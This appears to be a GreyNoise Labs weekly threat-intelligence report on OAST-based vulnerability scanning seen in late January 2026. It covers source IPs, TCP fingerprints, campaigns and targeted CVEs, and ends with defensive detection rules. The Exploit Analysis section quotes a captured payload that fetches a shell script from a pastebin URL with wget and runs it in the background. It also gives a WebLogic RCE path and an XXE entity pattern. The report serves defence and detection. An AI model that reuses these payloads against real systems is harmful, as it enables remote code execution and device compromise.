GreyNoise Labs Weekly OAST (Well-known Out-of-band Interaction Domains) Report • Week Ending 2026-01-31

Between January 24-31, 2026, the GreyNoise Global Observation Grid recorded 6,752 sessions from 58 IPs containing 5,531 unique OAST callback domains across 48 campaigns. Activity targeted enterprise applications, IoT devices, and cloud infrastructure.
OAST
MCP
projectdiscovery
interactsh
rce
iocs
detection engineering
cybersecurity
Author

🔮Orbie✨

Published

January 31, 2026

Overview

Between January 24 and January 31, 2026, the GreyNoise Global Observaton Grid cataloged 6,752 scanning sessions from 58 unique IP addresses embedding 5,531 distinct Out-of-band Application Security Testing (OAST) callback domains across 48 identified campaigns. The activity represents coordinated vulnerability reconnaissance targeting enterprise applications, IoT devices, and cloud infrastructure.

Key Indicators:

  • 5,531 OAST domains decoded from 28 unique machine identifiers
  • Anomalous TCP fingerprints (MSS 65495) observed in 11.8% of traffic
  • Multiple high-severity CVE exploits including WebLogic RCE, Java deserialization, and React prototype pollution
  • Sustained campaign activity spanning 3.6 weeks (earliest OAST timestamp: 2026-01-05)

Infrastructure Analysis

Network Distribution

ASN Organization Countries Session Count % of Total
AS14956 RouterHosting LLC Germany 2,344 34.7%
AS24806 INTERNET CZ, a.s. Czech Republic 1,824 27.0%
AS31898 Oracle Corporation Canada, South Korea 1,400 20.7%
AS14061 DigitalOcean Singapore 326 4.8%
AS210538 KEYUBU Internet Turkey 656 9.7%
Other Various 22 countries 202 3.0%

JA4 Fingerprint Analysis

Three primary fingerprint families identified:

1. Standard Linux Scanner (79.5% of traffic)

JA4T: 64240_2-4-8-1-3_1460_7
  • Window Size: 64240
  • MSS: 1460 (standard)
  • Sessions: 5,372
  • Assessment: Consistent with modified Linux scanning tools or frameworks

2. Anomalous Scanner Type A (8.2% of traffic)

JA4T: 33280_2-4-8-1-3_65495_7
  • Window Size: 33280
  • MSS: 65495 (ANOMALOUS)
  • Sessions: 556
  • Assessment: Custom network stack - MSS value 65495 not found in legitimate software

3. Anomalous Scanner Type B (3.6% of traffic)

JA4T: 65495_2-4-8-1-3_65495_7
  • Window Size: 65495
  • MSS: 65495 (ANOMALOUS)
  • Sessions: 245
  • Assessment: Highly distinctive custom stack configuration

Significance: MSS value 65495 is a strong fingerprint for purpose-built scanning infrastructure. This value approaches the theoretical TCP MSS maximum (65535) and is never used by standard operating systems or network stacks.

Top Source IPs

IP Address Country ASN Sessions First Seen Last Seen
172.86.66.237 Germany AS14956 2,344 2026-01-27 2026-01-31
194.182.90.104 Czech Republic AS24806 1,824 2026-01-25 2026-01-31
40.233.66.153 Canada AS31898 789 2026-01-27 2026-01-29
168.107.59.85 South Korea AS31898 611 2026-01-24 2026-01-30
31.57.77.235 Turkey AS210538 575 2026-01-28 2026-01-30

OAST Campaign Analysis

Decoded 5,531 OAST domains revealing 48 distinct campaigns across 28 unique machine IDs.

Top 5 Campaigns by Volume

Campaign: dftn9

  • OAST Domains: 2,044 (36.9%)
  • Machine ID: af:ed:d2
  • PIDs: 45287, 6518
  • Duration: January 27-29, 2026 (1.7 days)
  • K-Sort Values: d5sf0j, d5tidb
  • Assessment: Largest campaign by domain count - intensive burst scanning

Campaign: vn6u3

  • OAST Domains: 892 (16.1%)
  • Machine ID: f7:37:86
  • PIDs: 54381, 42767, 35027, 42599
  • Duration: January 27-30, 2026 (3.3 days)
  • K-Sort Values: d5seuo, d5t1qc, d5ug5j, d5ul4a
  • Assessment: Sustained scanning with multiple process restarts

Campaign: gffll

  • OAST Domains: 465 (8.4%)
  • Machine ID: 0f:7d:6a
  • PIDs: 34674, 57772
  • Duration: January 27-29, 2026 (1.5 days)
  • Assessment: Coordinated with dftn9 campaign - similar temporal window

Campaign: 49ndh

  • OAST Domains: 293 (5.3%)
  • Machine ID: 89:bb:62
  • PIDs: 53182, 55486
  • Duration: January 25-30, 2026 (5.0 days)
  • Assessment: Longest-running campaign with steady activity

Campaign: s9ndh

  • OAST Domains: 8 (0.1%)
  • Machine ID: 89:bb:62
  • First Seen: January 24, 2026
  • Assessment: Early reconnaissance phase from same machine as 49ndh campaign

OAST Infrastructure: Domains primarily used .oast.fun, .oast.live, .oast.me, .oast.pro, and .oast.site TLDs - all associated with the Interactsh OAST service.

Exploit Analysis

CVEs Actively Exploited

CVE-2020-14882 / CVE-2020-14883 (Oracle WebLogic RCE)

  • Occurrences: 23+ payloads
  • Path: /_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession
  • Payload Type: Java deserialization leading to RCE
  • Severity: Critical (CVSS 9.8)

React Prototype Pollution with Malware Loader

  • Occurrences: 17+ variants
  • Malware Staging: https://pastebin.com/raw/9GEqrAq5
  • Execution Methods: setsid, nohup, dos2unix - designed for persistence
  • Payload Pattern:
process.mainModule.require('child_process').execSync(
  'cd /tmp;wget -O run.sh https://pastebin.com/raw/9GEqrAq5;
   chmod +x run.sh;setsid sh run.sh < /dev/null > /dev/null 2>&1 &'
)

Java Deserialization Attacks

  • Frameworks Targeted:
    • Apache Commons (PriorityQueue deserialization)
    • JNDI injection via JdbcRowSetImpl
    • Apache Spark RCE (CVE-2018-11770)
  • Occurrences: Multiple variants across 6+ payload families

XML External Entity (XXE) Injection

  • Occurrences: 8+ payloads
  • Technique: <!ENTITY % xxe SYSTEM "http://[oast-domain]">
  • Target: XML parsers in enterprise applications

IoT/Network Device Command Injection

  • Targets: TP-Link, D-Link, GPON ONT devices
  • Commands: wget, curl, nslookup with OAST callbacks
  • Assessment: Opportunistic targeting of known IoT vulnerabilities

Targeted Applications/Services

  • Oracle WebLogic Server
  • WordPress (multiple plugins)
  • Grafana
  • pfBlockerNg
  • Apache Spark
  • Seeyon OA
  • Various GPON/ONT firmware
  • ColdFusion (Adobe)

Temporal Analysis

Session Volume by Day

Date Sessions Unique IPs Peak Hour Burst Detected
2026-01-24 73 8 12:00 UTC No
2026-01-25 361 9 19:00 UTC Yes (282 sessions)
2026-01-26 459 18 04:00 UTC Yes (273 sessions)
2026-01-27 1,629 19 17:00 UTC Yes (492 sessions)
2026-01-28 1,240 11 05:00 UTC Yes (372 sessions)
2026-01-29 840 7 13:00 UTC Yes (210 sessions)
2026-01-30 1,552 21 19:00 UTC Yes (406 sessions)
2026-01-31 598 5 00:00 UTC Yes (377 sessions)

Burst Pattern Analysis

39 hourly bursts detected (>100% increase over previous hour):

  • Peak burst: 2026-01-30 19:00 UTC - 406 sessions (from 2 previous hour)
  • Consistent evening UTC bursts (17:00-21:00)
  • Suggests automated scanning orchestration with scheduled execution

Historical Context & Campaign Lifecycle

Pre-Dating Evidence

OAST timestamp analysis reveals activity pre-dating sensor observation window:

  • Earliest OAST domain: January 5, 2026 (Campaign: 972vm)
  • Earliest sensor session: January 24, 2026
  • Gap: 19 days of prior activity

Assessment: The scanning infrastructure was operational for nearly 3 weeks before hitting GreyNoise sensors. This suggests:

  1. Established infrastructure - not a new/test campaign
  2. Broader target scope - GreyNoise sensors represent subset of total targets
  3. Ongoing operations - campaigns likely continuing beyond observation window

Campaign Coordination Indicators

Evidence of coordinated operations: 1. Shared OAST infrastructure - all campaigns use same Interactsh service 2. Overlapping temporal windows - major campaigns (dftn9, vn6u3, gffll) active Jan 27-29 3. Common exploit payloads - same CVEs targeted across multiple source IPs 4. Fingerprint diversity - deliberate use of multiple TCP stack configurations

Attribution & Threat Actor Assessment

Confidence: Medium

Indicators:

  • Professional OAST usage - 48 campaigns with unique machine IDs suggests organized tooling
  • Exploit diversity - targets enterprise (WebLogic, Spark) and IoT infrastructure
  • Custom fingerprints - MSS 65495 indicates purpose-built scanning tools
  • No attribution artifacts - no clear C2 domains, staging servers use Pastebin

Likely Actor Profile

Opportunistic vulnerability research collective or bug bounty operation:

  • Not APT/nation-state - too noisy, lacks operational security
  • Possibly legitimate - OAST usage consistent with security research
  • Commercial tooling - fingerprint diversity suggests framework usage (Nuclei, custom scanners)

Alternative assessment: Reconnaissance for follow-on exploitation by multiple threat actors sharing infrastructure.

Recommendations

Immediate Actions

  1. Block source IPs - All 58 IPs confirmed as scanning infrastructure
  2. Monitor OAST callbacks - Alert on connections to .oast.* domains
  3. Patch CVEs - Prioritize:
    • CVE-2020-14882/14883 (WebLogic)
    • Java deserialization vectors
    • IoT device firmware updates

Detection Engineering

Network Signatures:

# Anomalous MSS detection
alert tcp any any -> any any (msg:"Anomalous MSS 65495 - Custom Scanner"; \
  tcp.mss: 65495; sid:1000001;)

# OAST domain pattern
alert dns any any -> any 53 (msg:"Interactsh OAST Callback"; \
  dns.query; content:".oast."; sid:1000002;)

YARA for malware staging URL:

rule Pastebin_9GEqrAq5_Malware_Loader {
  strings:
    $url = "pastebin.com/raw/9GEqrAq5"
    $wget = "wget -O run.sh"
  condition:
    any of them
}

Long-term Monitoring

  1. Track machine ID evolution - Monitor for reuse of MAC prefixes (af:ed:d2, f7:37:86, 0f:7d:6a, 89:bb:62)
  2. JA4 fingerprint database - Add MSS 65495 patterns to threat intel feeds
  3. OAST domain correlation - Cross-reference k-sort values across future incidents

Conclusion

This analysis documents a multi-week reconnaissance campaign leveraging sophisticated OAST techniques across 48 distinct sub-campaigns. While the activity is noisy and detectable, the scale (5,531 callback domains), infrastructure diversity (28 machines), and exploit breadth indicate an organized operation.

The use of anomalous TCP fingerprints (MSS 65495) provides a high-confidence detection opportunity for defensive teams. Organizations should prioritize patching the identified CVEs and implementing OAST callback monitoring.